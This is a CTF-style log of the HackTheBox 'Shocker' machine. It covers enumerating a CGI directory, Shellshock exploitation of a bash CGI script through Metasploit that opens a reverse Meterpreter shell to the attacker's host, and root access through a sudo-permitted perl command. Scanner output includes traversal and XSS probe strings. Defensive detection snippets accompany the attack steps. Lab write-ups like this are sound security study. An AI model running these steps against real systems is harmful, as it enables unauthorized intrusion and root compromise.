roaris / ctf-log


HackTheBox: Shocker (Machine Easy) #33

Open roaris opened 4 months ago

roaris commented 4 months ago

https://app.hackthebox.com/machines/Shocker

$ nmap -sC -sV -Pn 10.10.10.56
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-02 09:23 JST
Nmap scan report for 10.10.10.56
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.55 seconds

roaris commented 4 months ago

Apparently OpenSSH 7.2p2 allows username enumeration: https://www.exploit-db.com/exploits/40136

Following https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/ssh/ssh_enumusers.md, I'll try it with Metasploit.

msf6 > search openssh

Matching Modules
================

   #  Name                                         Disclosure Date  Rank    Check  Description
   -  ----                                         ---------------  ----    -----  -----------
   0  post/windows/manage/forward_pageant                           normal  No     Forward SSH Agent Requests To Remote Pageant
   1  post/windows/manage/install_ssh                               normal  No     Install OpenSSH for Windows
   2  post/multi/gather/ssh_creds                                   normal  No     Multi Gather OpenSSH PKI Credentials Collection
   3  auxiliary/scanner/ssh/ssh_enumusers                           normal  No     SSH Username Enumeration
   4  exploit/windows/local/unquoted_service_path  2001-10-25       great   Yes    Windows Unquoted Service Path Privilege Escalation

Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/local/unquoted_service_path

msf6 > use auxiliary/scanner/ssh/ssh_enumusers
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RHOST 10.10.10.56
RHOST => 10.10.10.56
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RPORT 2222
RPORT => 2222
msf6 auxiliary(scanner/ssh/ssh_enumusers) > echo "admin\nadministrator" > users
[*] exec: echo "admin\nadministrator" > users

msf6 auxiliary(scanner/ssh/ssh_enumusers) > cat users
[*] exec: cat users

admin
administrator
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set user_file users
user_file => users
msf6 auxiliary(scanner/ssh/ssh_enumusers) > exploit

[*] 10.10.10.56:2222 - SSH - Using malformed packet technique
[*] 10.10.10.56:2222 - SSH - Checking for false positives
[*] 10.10.10.56:2222 - SSH - Starting scan
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

roaris commented 4 months ago

gobuster didn't turn up anything either.

$ gobuster dir --url http://10.10.10.56 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================

roaris commented 4 months ago

I'm stuck, so I'll look at Guided Mode.

How many TCP ports are listening on Shocker?

2

What is the name of the directory available on the webserver that is a standard name known for running scripts via the Common Gateway Interface? Hint : Run a tool like gobuster or feroxbuster to bruteforce directories on Shocker, or research the question on the internet.

I did run gobuster, though...

roaris commented 4 months ago

Apparently the requests were returning 404 because there was no trailing /. Adding -f appends a trailing /, so I'll run it again.

$ gobuster dir --url http://10.10.10.56 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -f
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/             (Status: 403) [Size: 294]
/icons/               (Status: 403) [Size: 292]
Progress: 40459 / 87665 (46.15%)

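It's only partway through, but I guess this is everything it will find (it takes too long). There's apparently also something called server-status, but it wasn't in /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt.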

roaris commented 4 months ago

What is the name of the directory available on the webserver that is a standard name known for running scripts via the Common Gateway Interface? Hint : Run a tool like gobuster or feroxbuster to bruteforce directories on Shocker, or research the question on the internet.

cgi-bin

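/cgi-bin/ and /icons/ were found, but both return 403, so I can't view them. About CGI: https://www.tohoho-web.com/wwwcgi1.htm Are there CGI programs inside cgi-bin? Are the CGI programs directly under cgi-bin, or are there further directories below it? Searching for "gobuster cgi" only turns up writeups for this machine.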

roaris commented 4 months ago

What is the name of the script in the cgi-bin directory? Hint : Run a brute force tool again on /cgi-bin/, and make sure to include extensions for common scripts like .cgi, .sh, and .pl.

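For now, should I just assume the CGI programs sit directly under the cgi-bin directory (or is that simply how it works)?

When searching for files, you specify the extensions with the -x option: https://patchthenet.com/blog/using-gobuster-to-find-hidden-web-content/ The dir command stays as it is.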

$ gobuster --help
Usage:
  gobuster [command]

Available Commands:
  completion  Generate the autocompletion script for the specified shell
  dir         Uses directory/file enumeration mode
...

Which wordlist should I use? I'll try https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/cgis.txt. It already includes extensions, so the -x option isn't needed.

$ gobuster dir --url http://10.10.10.56 --wordlist /usr/share/wordlists/dirbuster/cgis.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/cgis.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/./                   (Status: 200) [Size: 137]
Progress: 181 / 3495 (5.18%)[ERROR] parse "http://10.10.10.56/%NETHOOD%/": invalid URL escape "%NE"
/?mod=some_thing&op=browse (Status: 200) [Size: 137]
/?mod=node&nid=some_thing&op=view (Status: 200) [Size: 137]
/./                   (Status: 200) [Size: 137]
/                     (Status: 200) [Size: 137]
/?Open                (Status: 200) [Size: 137]
/?OpenServer          (Status: 200) [Size: 137]
/                     (Status: 200) [Size: 137]
/%2e/                 (Status: 200) [Size: 137]
[ERROR] parse "http://10.10.10.56/%a%s%p%d": invalid URL escape "%a%"
/%2e/                 (Status: 200) [Size: 137]
/%2e/                 (Status: 200) [Size: 137]
Progress: 511 / 3495 (14.62%)[ERROR] parse "http://10.10.10.56/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%": invalid URL escape "%"
[ERROR] parse "http://10.10.10.56/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%": invalid URL escape "%"
/../../../../../../../../../boot.ini (Status: 400) [Size: 303]
/../../../../winnt/repair/sam._ (Status: 400) [Size: 303]
///./../.../boot.ini  (Status: 400) [Size: 303]
/DomainFiles/*//../../../../../../../../../../etc/passwd (Status: 400) [Size: 303]
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd (Status: 400) [Size: 303]
/../../../../../../../../../../etc/passwd (Status: 400) [Size: 303]
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini (Status: 400) [Size: 303]
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd (Status: 400) [Size: 303]
/?mod=<script>alert(document.cookie)</script>&op=browse (Status: 200) [Size: 137]
/?sql_debug=1         (Status: 200) [Size: 137]
//                    (Status: 200) [Size: 137]
/file/../../../../../../../../etc/ (Status: 400) [Size: 303]
/cgi-bin/             (Status: 403) [Size: 294]
/cgi-bin/             (Status: 403) [Size: 294]
/server-status        (Status: 403) [Size: 299]
/?PageServices        (Status: 200) [Size: 137]
/?wp-cs-dump          (Status: 200) [Size: 137]
/../webserver.ini     (Status: 400) [Size: 303]
/./../../../../../../../../../etc/* (Status: 400) [Size: 303]
/./../../../../../../../../../etc/passw* (Status: 400) [Size: 303]
/../config.dat        (Status: 400) [Size: 303]
/cgi-bin/             (Status: 403) [Size: 294]
/cgi-bin/.htaccess    (Status: 403) [Size: 303]
/cgi-bin/.htaccess.old (Status: 403) [Size: 307]
/cgi-bin/.htaccess.save (Status: 403) [Size: 308]
/cgi-bin/.htaccess~   (Status: 403) [Size: 304]
/cgi-bin/.htpasswd    (Status: 403) [Size: 303]
/.htpasswd            (Status: 403) [Size: 295]
/.htaccess            (Status: 403) [Size: 295]
///../../data/config/microsrv.cfg (Status: 400) [Size: 303]
///////../../../../../../etc/passwd (Status: 400) [Size: 303]
/icons/               (Status: 403) [Size: 292]
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// (Status: 200) [Size: 137]
/                     (Status: 200) [Size: 137]
/?pattern=/etc/*&sort=name (Status: 200) [Size: 137]
/?N=D                 (Status: 200) [Size: 137]
/?S=A                 (Status: 200) [Size: 137]
/?D=A                 (Status: 200) [Size: 137]
/?M=A                 (Status: 200) [Size: 137]
/cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe (Status: 400) [Size: 303]
/cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe (Status: 400) [Size: 303]
/cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe (Status: 400) [Size: 303]
/?\"><script>alert('Vulnerable');</script> (Status: 200) [Size: 137]
Progress: 3494 / 3495 (99.97%)
===============================================================
Finished
===============================================================

A lot came up, but none of it looks usable.

roaris commented 4 months ago

After reading https://qiita.com/Umbrage/items/9ae0698891583dffaf85, I'll use /usr/share/SecLists/Discovery/Web-Content/raft-medium-words.txt. It takes about 7 seconds to advance 0.1%, so it will take nearly 2 hours to finish.

$ gobuster dir --url http://10.10.10.56/cgi-bin --wordlist /usr/share/SecLists/Discovery/Web-Content/raft-medium-words.txt -x cgi,sh,pl
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/raft-medium-words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              cgi,sh,pl
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html.sh             (Status: 403) [Size: 302]
/.html.cgi            (Status: 403) [Size: 303]
/.html                (Status: 403) [Size: 299]
/.html.pl             (Status: 403) [Size: 302]
/user.sh              (Status: 200) [Size: 118]
/.htm                 (Status: 403) [Size: 298]
/.htm.pl              (Status: 403) [Size: 301]
/.htm.cgi             (Status: 403) [Size: 302]
/.htm.sh              (Status: 403) [Size: 301]
/.                    (Status: 403) [Size: 294]
/.htaccess            (Status: 403) [Size: 303]
/.htaccess.cgi        (Status: 403) [Size: 307]
/.htaccess.sh         (Status: 403) [Size: 306]
/.htaccess.pl         (Status: 403) [Size: 306]
Progress: 7957 / 252356 (3.15%)

I checked user.sh, but it's nothing much.

Content-Type: text/plain

Just an uptime test script

 09:33:33 up 13:16,  0 users,  load average: 0.00, 0.00, 0.00

Or so I thought, but user.sh turned out to be the answer to this question:

What is the name of the script in the cgi-bin directory? Hint : Run a brute force tool again on /cgi-bin/, and make sure to include extensions for common scripts like .cgi, .sh, and .pl.

So this is important...?

roaris commented 4 months ago

Searching for cgi-bin/user.sh only turns up writeups for this machine.

Optional question: The output from user.sh matches the output from what standard Linux command? Hint : Try searching for some of the words in the output, and play around in a terminal on your local system to see if you can match the output.

Apparently it's the uptime command: https://eng-entrance.com/linux-command-uptime First time I've heard of it.

roaris commented 4 months ago

What 2014 CVE ID describes a remote code execution vulnerability in Bash when invoked through Apache CGI? Hint : This vulnerability was very famous, given the names Shellshock and Bashbug.

I did look up Apache 2.4.18 on Exploit DB, though...

https://www.exploit-db.com/exploits/34900 So it's this one? https://nvd.nist.gov/vuln/detail/CVE-2014-6271 https://nvd.nist.gov/vuln/detail/CVE-2014-6278

So it's a vulnerability in Bash, not Apache.

https://www.digicert.com/jp/blog/shellshock-cve-2014-6271 I don't get it. Granted that HTTP headers are passed to the CGI program via environment variables, why does a command embedded in an HTTP header get executed?

https://www.nca.gr.jp/info/gnu-bash-shellshock.html

CGI programs launched from mod_cgi or mod_cgid on Linux-based web servers may be affected if they (explicitly or implicitly) invoke GNU bash.

I see, so since user.sh is a CGI program and runs the uptime command, it looks attackable. I don't know the Bash version, though.
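
The question in the comment above comes down to how CGI hands a request to the script: each request header becomes an environment variable, and a vulnerable bash treats a value that begins with `() {` as a function definition to import, then keeps processing whatever follows it. As an added example (not part of the original log), this Python sketch applies the RFC 3875 header-to-variable mapping to raw requests and flags such values; the sample requests and function names are constructed for illustration.

```python
import re

# A bash function definition exported through the environment starts with "() {".
# Optional whitespace is tolerated here so near-variants are flagged as well.
FUNC_DEF = re.compile(r"^\s*\(\s*\)\s*\{")

# RFC 3875: these two headers map to meta-variables without the HTTP_ prefix.
UNPREFIXED = {"content-type": "CONTENT_TYPE", "content-length": "CONTENT_LENGTH"}


def cgi_env_name(header):
    """Name of the environment variable a CGI script sees for a request header."""
    lowered = header.strip().lower()
    if lowered in UNPREFIXED:
        return UNPREFIXED[lowered]
    return "HTTP_" + lowered.upper().replace("-", "_")


def parse_headers(raw_request):
    """Return [(name, value)] from a raw HTTP/1.x request (body ignored)."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip(), value.strip()))
    return pairs


def flag_function_definitions(raw_request):
    """List (env_var, value) pairs whose value looks like a bash function definition."""
    return [
        (cgi_env_name(name), value)
        for name, value in parse_headers(raw_request)
        if FUNC_DEF.match(value)
    ]


# Constructed sample requests (not captured traffic).
BENIGN = (
    "GET /cgi-bin/user.sh HTTP/1.1\r\n"
    "Host: 10.10.10.56\r\n"
    "User-Agent: gobuster/3.6\r\n\r\n"
)
SUSPECT = (
    "GET /cgi-bin/user.sh HTTP/1.1\r\n"
    "Host: 10.10.10.56\r\n"
    "User-Agent: () { :; }; echo constructed-marker\r\n\r\n"
)

if __name__ == "__main__":
    for label, request in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, flag_function_definitions(request))
```

The same pattern can be matched against logged header values; a hit means the request carried a function-definition prefix, whether or not the bash behind the CGI script was patched.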

roaris commented 4 months ago

It doesn't work.

msf6 > search shellshock

Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   0   exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)
   1   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   2   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   3   exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  Yes    CUPS Filter Bash Environment Variable Code Injection (Shellshock)
   4   auxiliary/server/dhclient_bash_env                 2014-09-24       normal     No     DHCP Client Bash Environment Variable Code Injection (Shellshock)
   5   exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  No     Dhclient Bash Environment Variable Injection (Shellshock)
   6   exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  Yes    IPFire Bash Environment Variable Injection (Shellshock)
   7   exploit/multi/misc/legend_bot_exec                 2015-04-27       excellent  Yes    Legend Perl IRC Bot Remote Code Execution
   8   exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     Yes    OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
   9   exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Yes    Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
   10  exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     No     Qmail SMTP Bash Environment Variable Injection (Shellshock)
   11  exploit/multi/misc/xdh_x_exec                      2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution

Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/misc/xdh_x_exec

msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CMD_MAX_LENGTH  2048             yes       CMD max line length
   CVE             CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent       yes       HTTP header to use
   METHOD          GET              yes       HTTP method to use
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPATH           /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT           80               yes       The target port (TCP)
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI                        yes       Path to CGI script
   TIMEOUT         5                yes       HTTP read response timeout (seconds)
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host

   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses
                                       .
   SRVPORT  8080             yes       The local port to listen on.

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.23.73.202    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOSTS 10.10.10.56
RHOSTS => 10.10.10.56
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/user.sh
TARGETURI => /cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 172.23.73.202:4444
[*] Command Stager progress - 100.00% done (1092/1092 bytes)
[*] Exploit completed, but no session was created.

roaris commented 4 months ago

I just hadn't set LHOST.

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 10.10.16.3
LHOST => 10.10.16.3
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 10.10.16.3:4444
[*] Command Stager progress - 100.00% done (1092/1092 bytes)
[*] Sending stage (1017704 bytes) to 10.10.10.56
[*] Meterpreter session 2 opened (10.10.16.3:4444 -> 10.10.10.56:43852) at 2024-05-03 00:02:51 +0900

meterpreter > shell
Process 11761 created.
Channel 1 created.
whoami
shelly
ls
user.sh

roaris commented 4 months ago

user.sh looked like this (hard to read because no prompt is shown)

pwd
/usr/lib/cgi-bin
cat user.sh
#!/bin/bash
echo
echo "Content-Type: text/plain"
echo ""
echo "Just an uptime test script"
echo
uptime
echo
echo

Found user.txt

pwd
/home/shelly
ls
user.txt

roaris commented 4 months ago

The bash version was 4.2.24. So that's why Shellshock worked.

bash --version
GNU bash, version 4.2.24(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

roaris commented 4 months ago

sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

I guess this means /usr/bin/perl can be run with root privileges.

roaris commented 4 months ago

/usr/bin/perl -e "print 'Hello World';"
Hello World

Just add sudo and launch /bin/bash as an OS command.

sudo /usr/bin/perl -e "system('/bin/bash');"
whoami
root
cd /root
ls
root.txt
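
From the defending side, the finding in this comment is a sudoers rule that hands a general-purpose interpreter to an unprivileged account. As an added example (not part of the original log), this Python sketch parses `sudo -l` output like the one shown earlier and flags rules that run a shell-capable program as root; the program list and the second sample are assumptions made for illustration.

```python
import os
import re

# Assumption: an illustrative, incomplete list of programs that can start a shell
# or run arbitrary code, so a sudo rule for them amounts to full root access.
SHELL_CAPABLE = {"perl", "python", "ruby", "php", "bash", "sh",
                 "vi", "vim", "awk", "find", "less"}

# One rule line of `sudo -l`, e.g. "    (root) NOPASSWD: /usr/bin/perl"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return one dict per command listed after the 'may run' line."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        runas_user = m["runas"].split(":")[0].strip()
        for cmd in m["cmds"].split(","):
            if cmd.strip():
                rules.append({"runas": runas_user,
                              "nopasswd": "NOPASSWD" in tags,
                              "command": cmd.strip()})
    return rules


def risky_rules(text):
    """Rules that let the user run a shell-capable program (or ALL) as root."""
    found = []
    for rule in parse_sudo_l(text):
        if rule["runas"] not in ("root", "ALL"):
            continue
        program = os.path.basename(rule["command"].split()[0])
        program = re.sub(r"[\d.]+$", "", program)  # python3.8 -> python
        if rule["command"] == "ALL" or program in SHELL_CAPABLE:
            found.append(rule)
    return found


# The `sudo -l` output from this log.
PAGE_OUTPUT = r"""Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
"""

# Constructed sample: a narrowly scoped rule that still asks for a password.
CONSTRUCTED_SAFE = """User deploy may run the following commands on web01:
    (root) /usr/bin/systemctl status nginx
"""

if __name__ == "__main__":
    for label, output in (("page", PAGE_OUTPUT), ("constructed", CONSTRUCTED_SAFE)):
        print(label, risky_rules(output))
```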

roaris commented 4 months ago

Apparently bash -i gives you a prompt.

bash -i
bash: no job control in this shell
root@Shocker:/root# ls
ls
root.txt
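
roaris commented 4 months ago

Summary of the solution

  1. Run gobuster. Without -f to append a trailing /, nothing comes up
  2. Focus on the cgi-bin directory
  3. Use gobuster to search for files inside cgi-bin
  4. Find user.sh
  5. The fact that CGI is in use, together with the existence of user.sh, leads to the idea of exploiting the Shellshock vulnerability
  6. Get a reverse shell and grab user.txt
  7. sudo -l shows that /usr/bin/perl can be run with root privileges; escalate to root and grab root.txt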